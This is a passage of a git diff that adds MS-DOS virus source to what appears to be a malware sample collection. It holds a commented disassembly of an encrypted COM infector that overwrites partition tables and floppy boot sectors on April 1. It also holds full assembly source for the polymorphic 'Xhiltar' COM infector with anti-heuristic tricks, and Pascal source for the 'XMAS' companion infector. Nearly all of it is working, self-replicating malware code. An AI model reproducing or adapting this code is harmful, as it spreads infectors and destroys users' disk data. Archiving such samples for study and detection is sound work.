7411 je 0183 ; found + +0172 8BF8 mov di,ax ; last starting point +0174 32C0 xor al,al +0176 B5FF mov ch,FF ; maximum block size +0178 F2AE repnz scasb +017A 74E4 je 0160 + +017C BF1A05 mov di,051A ; end of buffer for path +017F 8CC8 mov ax,cs ; restore ES +0181 8EC0 mov es,ax +0183 C706C1056205 mov word ptr [05C1],0562 + +; set local DTA + +0189 BA3605 mov dx,0536 +018C B41A mov ah,1A ; set DTA +018E CD21 int 21 + +0190 A1F906 mov ax,[06F9] +0193 A3F706 mov [06F7],ax +0196 A1FD06 mov ax,[06FD] +0199 A3FB06 mov [06FB],ax +019C B90500 mov cx,0005 ; counter of potential victims +019F BA1505 mov dx,0515 ; '*.COM', 0 +01A2 06 push es +01A3 57 push di +01A4 51 push cx + +01A5 8CC8 mov ax,cs +01A7 8EC0 mov es,ax +01A9 B9FFFF mov cx,FFFF ; all possible attributes +01AC B44E mov ah,4E ; find first +01AE EB06 jmp 01B6 + +01B0 59 pop cx ; restore counter +01B1 E35B jcxz 020E ; limit reached, check show/destruction + +01B3 B44F mov ah,4F ; find next +01B5 51 push cx ; store counter + +01B6 CD21 int 21 +01B8 7203 jb 01BD ; continue + +01BA E9F100 jmp 02AE + +; restore address of path in environment block + +01BD 59 pop cx +01BE 5F pop di +01BF 07 pop es + +01C0 26803D00 cmp es:byte ptr [di],00 ; end of block? +01C4 744A je 0210 ; yes + +; copy path to buffer + +01C6 BB6205 mov bx,0562 ; offset of buffer + +01C9 268A05 mov al,es:[di] ; next character +01CC 0AC0 or al,al ; end of block? +01CE 740A je 01DA ; yes + +01D0 47 inc di +01D1 3C3B cmp al,3B ; ';', end of path? +01D3 7405 je 01DA ; yes + +01D5 8807 mov [bx],al ; copy character +01D7 43 inc bx ; increase pointer +01D8 EBEF jmp 01C9 ; get next character + +01DA 81FB6205 cmp bx,0562 ; buffer not empty? +01DE 74E0 je 01C0 ; empty + +01E0 8A47FF mov al,[bx-01] +01E3 3C3A cmp al,3A ; ':', root directory +01E5 7408 je 01EF ; yes + +01E7 3C5C cmp al,5C ; check last character, '\' +01E9 7404 je 01EF ; there is + +01EB C6075C mov byte ptr [bx],5C ; add '\' +01EE 43 inc bx ; pointer to last character +01EF 06 push es +01F0 57 push di +01F1 51 push cx +01F2 891EC105 mov [05C1],bx ; store it +01F6 8BF3 mov si,bx +01F8 81EB6205 sub bx,0562 ; find path length +01FC 8BCB mov cx,bx +01FE BF1405 mov di,0514 ; destination buffer +0201 8CC8 mov ax,cs ; restore ES +0203 8EC0 mov es,ax +0205 4E dec si +0206 FD std +0207 F3A4 rep movsb ; copy +0209 8BD7 mov dx,di +020B 42 inc dx +020C EB97 jmp 01A5 ; find first + +; end of infection proces, check condition for destruction/show + +020E 58 pop ax ; balance stack +020F 58 pop ax + +0210 8CC8 mov ax,cs ; restore ES +0212 8EC0 mov es,ax + +; get date + +0214 B42A mov ah,2A ; get date +0216 CD21 int 21 + +0218 81FA0104 cmp dx,0401 ; April 1? +021C 7533 jne 0251 ; no + +;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> +; +; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B: +; +;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> + +; copy partition table to sector 11h of side 0, track 0 + +021E BA8000 mov dx,0080 ; first hard drive +0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table) +0224 BB0307 mov bx,0703 ; destroy victim code +0227 B80102 mov ax,0201 ; read 1 sector +022A 52 push dx +022B 51 push cx +022C 53 push bx +022D CD13 int 13 ; disk I/O +022F 5B pop bx +0230 59 pop cx +0231 5A pop dx +0232 B111 mov cl,11 ; new place for partition table +0234 B80103 mov ax,0301 ; write partition table +0237 CD13 int 13 + +; set and of sector marker in the buffer + +0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker + +; overwrite partition table + +023F B280 mov dl,80 +0241 E87404 call 06B8 ; write one sector to disk + +; overwrite boot sector of drive A: + +0244 32D2 xor dl,dl +0246 E86F04 call 06B8 ; write one sector do disk + +; overwrite boot sector of drive B: + +0249 B201 mov dl,01 +024B E86A04 call 06B8 ; write disk + +024E EB0A jmp 025A +0250 90 nop + +; compare date + +0251 81FA180C cmp dx,0C18 ; december 24? +0255 7203 jb 025A ; date earlier + +;<><><><<><><><><><><><><><><><><><><><> +; +; CHRISTMAS SHOW +; +; see the description of subroutine 05D7 +;<><><><><><><><><><><><><><><><><><><><><> + +0257 E87D03 call 05D7 ; drow christmas tree + +; make sound + +025A E440 in al,40 +025C 3CF8 cmp al,F8 +025E 7206 jb 0266 + +0260 E461 in al,61 +0262 0C03 or al,03 +0264 E661 out 61,al + +; restore the state of scroll lock flag + +0266 33C0 xor ax,ax +0268 8ED8 mov ds,ax +026A 58 pop ax +026B 08061704 or [0417],al + +; restore INT 24h + +026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP +0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP +0279 B82425 mov ax,2524 ; set interrupt vector +027C CD21 int 21 + +; restore DTA + +027E 5A pop dx +027F 1F pop ds +0280 B41A mov ah,1A ; set DTA +0282 CD21 int 21 + +; restore DS + +0284 8CC8 mov ax,cs +0286 8ED8 mov ds,ax + +0288 BEF006 mov si,06F0 +028B 8B3EF706 mov di,[06F7] +028F 033EFB06 add di,[06FB] +0293 57 push di +0294 B90700 mov cx,0007 +0297 FC cld +0298 F3A4 rep movsb +029A 33C0 xor ax,ax +029C 8BD8 mov bx,ax +029E 8BD0 mov dx,ax +02A0 8BE8 mov bp,ax + +02A2 8B36F706 mov si,[06F7] +02A6 BF0001 mov di,0100 +02A9 8B0EFB06 mov cx,[06FB] +02AD C3 ret + +02AE BE5405 mov si,0554 ; file name in FCB +02B1 8B3EC105 mov di,[05C1] ; address of destination +02B5 B90D00 mov cx,000D ; length of asciiz string +02B8 FC cld +02B9 F3A4 rep movsb ; copy +02BB BF2005 mov di,0520 ; buffer for file name +02BE E8FA01 call 04BB ; copy +02C1 7503 jne 02C6 + +02C3 E9EAFE jmp 01B0 ; find next/destruct/show + +02C6 BF2B05 mov di,052B +02C9 E8EF01 call 04BB ; copy file name +02CC 7503 jne 02D1 + +02CE E9DFFE jmp 01B0 ; find next/destruct/show + +02D1 C606610500 mov byte ptr [0561],00 +02D6 90 nop +02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA +02DC 740F je 02ED ; hiden, system or read only, open file + +02DE BA6205 mov dx,0562 ; file name +02E1 33C9 xor cx,cx ; clear all attributes +02E3 B80143 mov ax,4301 ; set file attributes +02E6 CD21 int 21 +02E8 7303 jnb 02ED ; open file + +02EA E9C3FE jmp 01B0 ; find next/destruct/show + +02ED BA6205 mov dx,0562 +02F0 B8023D mov ax,3D02 ; open file for read/write +02F3 CD21 int 21 + +02F5 8BD8 mov bx,ax ; handle +02F7 7303 jnb 02FC + +02F9 E9B4FE jmp 01B0 ; find next + +; check file size + +02FC A15205 mov ax,[0552] ; high word of file size in DTA +02FF 0BC0 or ax,ax +0301 7403 je 0306 ; file below 64K + +0303 E99001 jmp 0496 ; close file and find next + +0306 A15005 mov ax,[0550] ; lower word of file size +0309 3D0700 cmp ax,0007 ; minimum file size +030C 72F5 jb 0303 ; close file and find next + +030E 3D00F8 cmp ax,F800 ; maximum file size +0311 73F0 jnb 0303 ; close file and find next + +; mayby already infected? + +0313 8B16F706 mov dx,[06F7] ; form address of bufer +0317 0316FB06 add dx,[06FB] +031B B90700 mov cx,0007 ; number of bytes +031E 52 push dx +031F 51 push cx +0320 B43F mov ah,3F ; read file +0322 CD21 int 21 + +0324 59 pop cx +0325 5E pop si +0326 7208 jb 0330 ; read error, close and find next + +; compare first 7 bytes with own code + +0328 BF0001 mov di,0100 ; destination +032B FC cld +032C F3A6 rep cmpsb +032E 7503 jne 0333 + +0330 E96301 jmp 0496 ; close file and find next, (infected!) + +; get and store file date and time + +0333 B80057 mov ax,5700 ; get file time stamp +0336 CD21 int 21 +0338 72F6 jb 0330 ; close file, find next + +033A 89160107 mov [0701],dx ; store date +033E 890EFF06 mov [06FF],cx ; store time +0342 C606610501 mov byte ptr [0561],01 +0347 90 nop + +; check file size, if less than 603h bytes then append some garbage + +0348 A15005 mov ax,[0550] ; file size +034B 3D0306 cmp ax,0603 +034E 7321 jnb 0371 + +; file length is less than 603h, add some garbage + +0350 33D2 xor dx,dx +0352 33C9 xor cx,cx +0354 B80242 mov ax,4202 ; move file ptr to EOF +0357 CD21 int 21 +0359 7303 jnb 035E ; no errors, continue + +035B E93801 jmp 0496 ; close file and find next + +035E B90306 mov cx,0603 ; number of bytes +0361 2B0E5005 sub cx,[0550] ; file size +0365 B440 mov ah,40 ; write file +0367 CD21 int 21 +0369 B80306 mov ax,0603 ; new file size +036C 7303 jnb 0371 + +036E E92501 jmp 0496 ; close file and find next + +; now file is at least 603h bytes long + +0371 FEC4 inc ah +0373 A3F906 mov [06F9],ax ; oryginal file size + 256 +0376 A15005 mov ax,[0550] ; file size +0379 BE0306 mov si,0603 ; virus length +037C 33FF xor di,di +037E 3BC6 cmp ax,si +0380 7302 jnb 0384 + +0382 8BF0 mov si,ax + +0384 8936FD06 mov [06FD],si + +0388 8BD7 mov dx,di +038A 33C9 xor cx,cx +038C B80042 mov ax,4200 ; move file ptr to BOF +038F CD21 int 21 +0391 7303 jnb 0396 + +0393 E90001 jmp 0496 ; close file and find next + +0396 8B16F706 mov dx,[06F7] +039A 0316FB06 add dx,[06FB] +039E B90002 mov cx,0200 +03A1 3BF1 cmp si,cx +03A3 7302 jnb 03A7 + +03A5 8BCE mov cx,si ; number of bytes + +03A7 52 push dx +03A8 51 push cx +03A9 B43F mov ah,3F ; read file +03AB CD21 int 21 +03AD 59 pop cx +03AE 5A pop dx +03AF 7303 jnb 03B4 ; continue + +03B1 E9E200 jmp 0496 ; close file and find next + +03B4 52 push dx +03B5 51 push cx +03B6 33D2 xor dx,dx +03B8 33C9 xor cx,cx +03BA B80242 mov ax,4202 ; move file ptr to EOF +03BD CD21 int 21 +03BF 59 pop cx +03C0 5A pop dx +03C1 7303 jnb 03C6 ; continue + +03C3 E9D000 jmp 0496 ; close file and find next + +03C6 B440 mov ah,40 ; write file +03C8 CD21 int 21 +03CA 7303 jnb 03CF + +03CC E9C700 jmp 0496 ; close file and find next + +03CF 81C70002 add di,0200 +03D3 81EE0002 sub si,0200 +03D7 7602 jbe 03DB + +03D9 EBAD jmp 0388 + +03DB FF060701 inc word ptr [0107] ; infection counter +03DF 33D2 xor dx,dx +03E1 33C9 xor cx,cx +03E3 B80042 mov ax,4200 ; move file ptr to BOF +03E6 CD21 int 21 +03E8 7303 jnb 03ED + +03EA E9A900 jmp 0496 ; close file and find next + +03ED 53 push bx ; store handle +03EE E440 in al,40 +03F0 A807 test al,07 +03F2 74FA je 03EE + +03F4 A21F01 mov [011F],al ; change decryption key + +; get random number from system timer count + +03F7 33C0 xor ax,ax +03F9 8AF8 mov bh,al +03FB 8ED8 mov ds,ax +03FD A06C04 mov al,[046C] ; timer, low byte + +0400 8CCA mov dx,cs ; restore DS +0402 8EDA mov ds,dx + +; generate rundom number in BX in the range 0..8 + +0404 B103 mov cl,03 +0406 F6F1 div cl ; AL <- AL/3, AH <- remainder +0408 8AEC mov ch,ah ; store remainder (0, 1 or 2) +040A 32E4 xor ah,ah ; prepare division +040C F6F1 div cl ; AL <- AL / 9, AH <- remainder +040E 8AC4 mov al,ah ; AL <- second remainder +0410 02C0 add al,al ; *2, AL in [0..4] +0412 02C4 add al,ah ; *3, AL in [0..6] +0414 02C5 add al,ch ; first remainder +0416 8AD8 mov bl,al ; BL in [0..8] + +; multiply BX by 4 (table entry size) + +0418 03DB add bx,bx +041A 03DB add bx,bx +041C 81C3C906 add bx,06C9 ; offset of table + +; modify encryption routine (automodyfication) + +0420 8A07 mov al,[bx] +0422 A22401 mov [0124],al ; 3 versions 5E/76/7E +0425 8B4701 mov ax,[bx+01] +0428 A32C01 mov [012C],ax ; 9 wersions +042B 8A4703 mov al,[bx+03] ; 3 versions +042E A23001 mov [0130],al +0431 8AC5 mov al,ch + +; prepare decrypt routine + +0433 BBED06 mov bx,06ED +0436 D7 xlat +0437 A26104 mov [0461],al ; modify decryption routine + +; write new encryption routine to file + +043A 5B pop bx ; restore handle +043B BA0001 mov dx,0100 ; begin of file +043E B93500 mov cx,0035 ; block size +0441 B440 mov ah,40 ; write file +0443 CD21 int 21 +0445 724F jb 0496 ; close file and find next + +; decryption routine + +0447 BE3501 mov si,0135 ; start of decrypted block +044A B9CE05 mov cx,05CE ; size of decrypted block +044D 53 push bx ; store handle +044E 51 push cx +044F B80002 mov ax,0200 +0452 8B1EF706 mov bx,[06F7] +0456 031EFB06 add bx,[06FB] +045A 53 push bx +045B 8A0E1F01 mov cl,[011F] ; decription key + +045F 8A2C mov ch,[si] +0461 D2CD ror ch,cl ; <-- changed (3 variants) + +; ^^ changed byte, possible wariants: +; 28CD sub ch,cl versions: 0, 3, 6 +; 30CD xor ch,cl versions: 1, 4, 7 +; D2CD ror ch,cl versions: 2, 5, 8 + +0463 882F mov [bx],ch +0465 43 inc bx +0466 46 inc si +0467 48 dec ax +0468 75F5 jne 045F + +046A 5A pop dx +046B 59 pop cx +046C 5B pop bx +046D 51 push cx +046E 81F90102 cmp cx,0201 +0472 7203 jb 0477 + +0474 B90002 mov cx,0200 +0477 B440 mov ah,40 ; write file +0479 CD21 int 21 +047B 59 pop cx +047C 7218 jb 0496 ; close file and find next + +047E 81E90002 sub cx,0200 +0482 77C9 ja 044D + +; restore file time stamp + +0484 8B160107 mov dx,[0701] ; file date +0488 8B0EFF06 mov cx,[06FF] ; file time +048C B80157 mov ax,5701 ; set file time stamp +048F CD21 int 21 +0491 7203 jb 0496 ; close file and find next + +; decrease counter on the stack + +0493 59 pop cx +0494 49 dec cx +0495 51 push cx + +0496 B43E mov ah,3E ; close file +0498 CD21 int 21 +049A 8A0E4B05 mov cl,[054B] ; attributes +049E FE0E6105 dec byte ptr [0561] +04A2 7405 je 04A9 + +04A4 F6C107 test cl,07 ; hidden, system, read only +04A7 740F je 04B8 + +04A9 80F920 cmp cl,20 ; archive +04AC 740A je 04B8 + +04AE BA6205 mov dx,0562 ; file name +04B1 32ED xor ch,ch +04B3 B80143 mov ax,4301 ; set file attributes +04B6 CD21 int 21 +04B8 E9F5FC jmp 01B0 ; find next + +;---------------------------------------- +; move 11 bytes do DS:DI ('C:\COMMAND.') + +04BB BE6205 mov si,0562 +04BE B90B00 mov cx,000B +04C1 FC cld +04C2 F3A6 rep cmpsb +04C4 C3 ret + +; buffer for path + +04C5 30 31 32 33 34 35 36 37 01234567 +04CD 38 39 30 31 32 33 34 35 89012345 +04D5 36 37 38 39 30 31 32 33 67890123 +04DD 34 35 36 37 38 39 30 31 45678901 +04E5 32 33 34 35 36 37 38 39 23456789 +04ED 30 31 32 33 34 35 36 37 01234567 +04F5 38 39 30 31 32 33 34 35 89012345 +04FD 36 37 38 43 3A 5C 4A 45 678C:\JE +0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P +050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\ + +; paterns for search + +0515 2A 2E 43 4F 4D 00 50 41 *.COM PA +051D 54 48 3D TH= + +; buffers for file names + +0520 49 42 4D 42 49 IBMBI +0525 4F 2E 43 4F 4D 00 O.COM + +052B 49 42 IB +052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM +0535 00 + +; local DTA + +0536 03 3F 3F 3F 3F 3F 3F ;\ +053D 3F 3F 43 4F 4D FF 02 00 ; | reserved +0545 00 00 00 00 00 00 ;/ +054B 20 ; file attribute +054C 00 60 71 0E ; file time stamp +0550 DB 62 00 00 ; file size +0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0) + +0561 01 ; flag: attributes are changed + +0562 43 3A 5C C:\ +0565 43 4F 4D 4D 41 4E 44 2E COMMAND. +056D 43 4F 4D 00 00 4D 00 00 COM M +0575 00 2E 43 4F 4D 00 4F 68 .COM Oh +057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo! +0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN +058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O +0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo +059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh +05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo! +05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN +05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O +05BD 68 4E 6F 21 hNo! + +05C1 65 05 ; + +;--------------------------------------- +; write character (or space) cx times + +05C3 B020 mov al,20 + +05C5 50 push ax +05C6 E89E00 call 0667 ; write character +05C9 58 pop ax +05CA E2F9 loop 05C5 +05CC C3 ret + +;------------- +; next line + +05CD B00D mov al,0D +05CF E89500 call 0667 ; write character +05D2 B00A mov al,0A +05D4 E99000 jmp 0667 ; write character + +;------------------------------ +; drow christmast tree +; +; result will look like this: +; +; +; +; *** +; ***** +; ******* +; ********* +; *********** +; ************* +; *************** +; ***************** +; ******************* +; ********************* +; *********************** +; ************************* +; *************************** +; ***************************** +; +; +; +; +; Und er lebt doch noch : Der Tannenbaum ! +; Frohe Weihnachten ... +; + +05D7 B92700 mov cx,0027 +05DA E8E6FF call 05C3 ; clear 39 characters +05DD B0AD mov al,AD ; '' +05DF E88500 call 0667 ; write character +05E2 E8E8FF call 05CD ; new line +05E5 BB0300 mov bx,0003 +05E8 BA2600 mov dx,0026 + +05EB 8BCA mov cx,dx +05ED E8D3FF call 05C3 ; write CX spaces +05F0 8BCB mov cx,bx +05F2 B02A mov al,2A ; '*' +05F4 E8CEFF call 05C5 ; write CX characters +05F7 E8D3FF call 05CD ; new line +05FA 4A dec dx +05FB 83C302 add bx,0002 +05FE 83FB1F cmp bx,001F +0601 75E8 jne 05EB + +0603 BB0300 mov bx,0003 +0606 B92600 mov cx,0026 +0609 E8B7FF call 05C3 ; write CX spaces +060C B90300 mov cx,0003 +060F B0DB mov al,DB ; '' +0611 E8B1FF call 05C5 ; write CX characters +0614 E8B6FF call 05CD ; next line +0617 4B dec bx +0618 75EC jne 0606 + +061A B95000 mov cx,0050 ; full line +061D B0CD mov al,CD ; '' +061F E8A3FF call 05C5 ; write character CX times +0622 B91300 mov cx,0013 +0625 E89BFF call 05C3 ; write CX spaces +0628 BB7406 mov bx,0674 ; string: Und er lebt doch ... +062B E82C00 call 065A ; write string +062E B91D00 mov cx,001D +0631 E88FFF call 05C3 ; clear part of line +0634 EB24 jmp 065A ; write asciiz string pointed by BX +0636 90 nop + +0637 E80000 call 063A + +063A 5B pop bx +063B 83C30D add bx,000D +063E 8CC8 mov ax,cs +0640 8ED8 mov ds,ax +0642 E81500 call 065A ; write string +0645 EBFE jmp 0645 ; hang CPU + +0647 41 70 72 69 6C 2C 20 41 April, A +064F 70 72 69 6C 20 2E 2E 2E pril ... +0657 20 07 00 + +;----------------------------------- +; write asciiz string pointed by BX + +065A 8A07 mov al,[bx] ; get character +065C 43 inc bx ; next character +065D 0AC0 or al,al ; and of string? +065F 7405 je 0666 ; yes, RET + +0661 E80300 call 0667 ; write character +0664 EBF4 jmp 065A ; get next character +0666 C3 ret + +;-------------------- +; write character TTL + +0667 52 push dx +0668 51 push cx +0669 53 push bx +066A 32FF xor bh,bh +066C B40E mov ah,0E +066E CD10 int 10 +0670 5B pop bx +0671 59 pop cx +0671 59 pop cx +0672 5A pop dx +0673 C3 ret + +0674 55 6E 64 20 65 72 20 6C Und er l +067C 65 62 74 20 64 6F 63 68 ebt doch +0684 20 6E 6F 63 68 20 3A 20 noch : +068C 44 65 72 20 54 61 6E 6E Der Tann +0694 65 6E 62 61 75 6D 20 21 enbaum ! +069C 0D 0A 00 46 72 6F 68 65 Frohe +06A4 20 57 65 69 68 6E 61 63 Weihnac +06AC 68 74 65 6E 20 2E 2E 2E hten ... +06B4 0D 0A 07 00 + +;------------------------------------------ +; write one sector to disk specified in DL +; track 9, side 0 sector 1 + +06B8 32F6 xor dh,dh +06BA B90100 mov cx,0001 +06BD BB3706 mov bx,0637 +06C0 B80103 mov ax,0301 +06C3 CD13 int 13 +06C5 C3 ret + +;================== +; INT 24h handler + +06C6 B000 mov al,00 +06C8 CF iret + +; table of bytes for changing encrypt routine + +06C9 5E 00 0F 43 +06CD 5E 30 0F 43 +06D1 5E D2 07 43 +06D5 76 00 0C 46 +06D9 76 30 0C 46 +06DD 76 D2 04 46 +06E1 7E 00 0D 47 +06E5 7E 30 0D 47 +06E9 7E D2 05 47 + +; table for variants of decrypt routine + +06ED 28 30 D2 + +; part of victime code + +06F0 F3A4 rep movsb +06F2 8BF1 mov si,cx +06F4 8BF9 mov di,cx +06F6 C3 ret + +06F7 0307 ; offset of buffer/modified code +06F9 DB63 ; file size + 256 +06FB C603 ; +06FD 0306 ; +06FF 0060 ; file date +0701 710E ; file time + diff --git a/MSDOS/Virus.MSDOS.Unknown.xhiltar.asm b/MSDOS/Virus.MSDOS.Unknown.xhiltar.asm new file mode 100644 index 00000000..ab4f1162 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.xhiltar.asm @@ -0,0 +1,151 @@ +; The Xhiltar Virus +; By Arsonic[Codebreakers] +; Type: Runtime Appending Com Infector +; Encrypted: Yes +; Polymorphic: Yes +; Time/Date: Yes +; add Attrib: Yes +; Changes Directory's: Yes (dotdot method) +; Anti-Anti-Virus: Yes (anti-heuristics) +db 0e9h,0,0 +start: +call delta +delta: +pop bp +sub bp,offset delta +mov cx,0ffffh ;fuck up those heristics! +fprot_loopy: +jmp back +mov ax,4c00h +int 21h +back: +loop fprot_loopy +lea si,[bp+hidden_start] +mov di,si +mov cx,end - hidden_start +call encryption +jmp hidden_start +value db 0 +encryption: ;encryption routine +call poly +encrypt: +lodsb ;1 +_1stDummy: +nop ;1 = +1 +xor al,byte ptr[bp+value] ;4 +_2ndDummy: +nop ;1 = +6 +stosb ;1 +_3rdDummy: +nop ;1 = +8 +loop encrypt ;2 +_4thDummy: +nop ;1 = +11 +ret +hidden_start: +mov cx,3 +mov di,100h ;restore the first 3 bytes +lea si,[bp+buff] +rep movsb +find_first: ;find first file +mov ah,4eh +find_next: +lea dx,[bp+filemask] +xor cx,cx ;with 0 attrib's.. +int 21h +jnc infect +close: +push 100h +ret +infect: +mov ax,3d02h ;open file +mov dx,9eh +int 21h +xchg bx,ax +mov ax,5700h ;get time/date +int 21h +push dx ;save the values +push cx +in al,40h ;get new encrypt value from system clock +mov byte ptr [bp+value],al +mov ah,3fh ;read 3 bytes from the file.. too +mov cx,3 ;be replaced with a jump to the virus +lea dx,[bp+buff] +int 21h +mov ax,word ptr [80h + 1ah] ;check for infect +sub ax,end - start + 3 +cmp ax,word ptr[bp+buff+1] +je close_file +mov ax,word ptr[80h + 1ah] +sub ax,3 +mov word ptr[bp+three+1],ax +mov ax,4200h ;goto start of file +xor cx,cx +xor dx,dx +int 21h +mov ah,40h ;write the 3 byte jump +lea dx,[bp+three] +mov cx,3 +int 21h +mov ax,4202h ;goto end of file +xor cx,cx +xor dx,dx +int 21h +mov ah,40h ;write the unencrypted area +lea dx,[bp+start] +mov cx,hidden_start - start +int 21h +lea si,[bp+hidden_start] ;encrypt the virus +lea di,[bp+end] +mov cx,end - hidden_start +call encryption +mov ah,40h ;write encrypted area +lea dx,[bp+end] +mov cx,end - hidden_start +int 21h +close_file: +mov ax,5701h ;restore time/date +pop cx ;with saved values +pop dx +int 21h +mov ah,3eh ;close file +int 21h +mov ah,4Fh ;find next file +jmp find_next +poly: +call random ;get random value +mov [bp+_1stDummy],dl ;write random do-nothing call to encrypt +call random +mov [bp+_2ndDummy],dl +call random +mov [bp+_3rdDummy],dl +call random +mov [bp+_4thDummy],dl +ret +garbage: +nop ; no operation instruction +clc ; Clear Carry +stc ; Set Carry +sti ; Set Interuppt Flag +cld ; Clear Direction Flag +cbw ; Convert byte to word +inc dx ; increase dx +dec dx ; decrease dx +lahf ; loads AH with flags +random: +in ax,40h +and ax,7 +xchg bx,ax +add bx,offset garbage +add bx,bp +mov dl,[bx] +ret +filemask db '*.com',0 +three db 0e9h,0,0 +buff db 0cdh,20h,0 +dotdot db '..',0 +author db 'Arsonic[Codebreakers]',13,10,'$' +virus db 'the XHiLTAR virus',13,10,'$' + db 'I LOVE U LISA',13,10,'$' + db 'I LOVE U SOOOO MUCH!',13,10,'$' +end: \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.xmas.pas b/MSDOS/Virus.MSDOS.Unknown.xmas.pas new file mode 100644 index 00000000..d6a134a6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.xmas.pas @@ -0,0 +1,179 @@ +{ + + XMAS Virus, a non-resident spawning .EXE infector by Glenn Benton + To be compiled with Turbo Assembler 6.0 + + Files required : XMAS.PAS - Viral part (this one) + XMAS.OBJ - Music data (composed by myself!) + PLAYIT.TPU - Music player engine + + Set the environment variables for different effects : + + SET XMAS=YES (Disable virus) + SET XMAS=TST (Plays the music only) + SET XMAS=DEL (Deletes the virus when a program is started) + + The compiled virus example is compressed and uses 6888 bytes... + + On 25th and 26th the virus activates, playing the music and + wishes you a merry X-mas (nice of me, isn't it?) + + +} + +Program Xmas; + +{$M 4096,0,512} + +Uses Crt, Dos, Playit; + +Label StartOrig; + +Var + Year, Month, Day, DayOfWeek : Word; + DirInfo : SearchRec; + ComSeek : SearchRec; + FileFound : Boolean; + FileName : String; + Parameters : String; + OrigName : String; + P : Byte; + ExtHere : Boolean; + Teller : Word; + StopChar : Char; + FromF : File; + +{Dit is de data van het te spelen liedje} +{$L XMAS.OBJ} +Procedure Christmas; EXTERNAL; + +{Deze routine wordt aangeroepen als het 25 of 26 december is} +Procedure Active; +Begin; +StopChar := #0; +ClrScr; +GotoXY(32,5); +WriteLn('Merry Christmas'); +GotoXY(38,7); +WriteLn('and'); +GotoXY(31,9); +WriteLn('A Happy New Year!'); +GotoXy(31,11); +WriteLn('Wished To You By:'); +GotoXy(34,17); +WriteLn('Glenn Benton'); +GotoXy(27,24); +WriteLn('Press any key to continue'); +Repeat + PlayOBJ(@Christmas, TRUE, StopChar); +Until StopChar<>#0; +End; + +{Deze procedure zoekt een EXE file waarvan er geen COM is en stuurt het + resultaat in de boolean FileFound en de naam van het te maken COM bestand + in FileName} +Procedure FileSeek; + +Label Seeker, FileSeekOk; +Begin; +FileFound:=False; +FindFirst('*.EXE',Anyfile,DirInfo); + +Seeker: +If DosError=18 Then Exit; +FileName:= DirInfo.Name; +Delete(FileName,Length(FileName)-2,3); +Insert('COM',FileName,Length(FileName)+1); +FindFirst(FileName,AnyFile,ComSeek); +If DosError=18 Then Goto FileSeekOk; +FindNext(DirInfo); +Goto Seeker; + +FileSeekOk: +FileFound:=True; +End; + +Procedure CopyFile; +var + FromF, ToF: file; + NumRead, NumWritten: Word; + buf: array[1..512] of Char; +begin; + { Open input file } + Assign(FromF, ParamStr(0)); + { Record size = 1 } + Reset(FromF, 1); + { Open output file } + Assign(ToF, FileName); + { Record size = 1 } + Rewrite(ToF, 1); + repeat + BlockRead(FromF,buf, + SizeOf(buf),NumRead); + BlockWrite(ToF,buf,NumRead,NumWritten); + until (NumRead = 0) or + (NumWritten <> NumRead); + Close(FromF); + Close(ToF); + Assign(ToF,FileName); + SetFAttr(ToF,Hidden); +end; + + +Begin; {Hoofdprocedure} +If (GetEnv('XMAS')='DEL') or (GetEnv('XMAS')='del') Then + Begin; + OrigName:=ParamStr(0); + ExtHere:=False; + P:=Pos('.COM',OrigName); + If P<>0 Then ExtHere:=True; + P:=Pos('.com',OrigName); + If P<>0 Then ExtHere:=True; + If ExtHere=False Then + OrigName:=OrigName+'.COM'; + Assign(FromF, OrigName); + SetFAttr(FromF,Archive); + Erase(FromF); + Goto StartOrig; + End; +If (GetEnv('XMAS')='TST') or (GetEnv('XMAS')='tst') Then + Begin; + Active; + Goto StartOrig; + End; + +If (GetEnv('XMAS')='YES') or (GetEnv('XMAS')='yes') Then Goto StartOrig; + +{Datum bekijken of het 25 of 26 december is en indien juist Active aanroepen} +GetDate(Year, Month, Day, DayOfWeek); +If (Month=12) and ((Day=25) or (Day=26)) then Active; + +{Procedure voor EXE file zoeken aanroepen} +FileSeek; + +{Als er een kandidaat is gevonden, dit prg als COM erbij zetten} +If FileFound=False Then Goto StartOrig; +CopyFile; + +StartOrig: +Parameters:=''; +For Teller:= 1 to ParamCount Do Parameters:=Parameters+' '+ParamStr(Teller); +OrigName:=ParamStr(0); +ExtHere:=False; +P:=Pos('.COM',OrigName); +If P<>0 Then ExtHere:=True; +P:=Pos('.com',OrigName); +If P<>0 Then ExtHere:=True; +If ExtHere=False Then + OrigName:=OrigName+'.EXE'; +If ExtHere=True Then + Begin; + Delete(OrigName,Length(OrigName)-3,4); + OrigName:=OrigName+'.EXE'; + End; +SwapVectors; +Exec(OrigName,Parameters); +SwapVectors; +Halt(DosExitCode); +End. +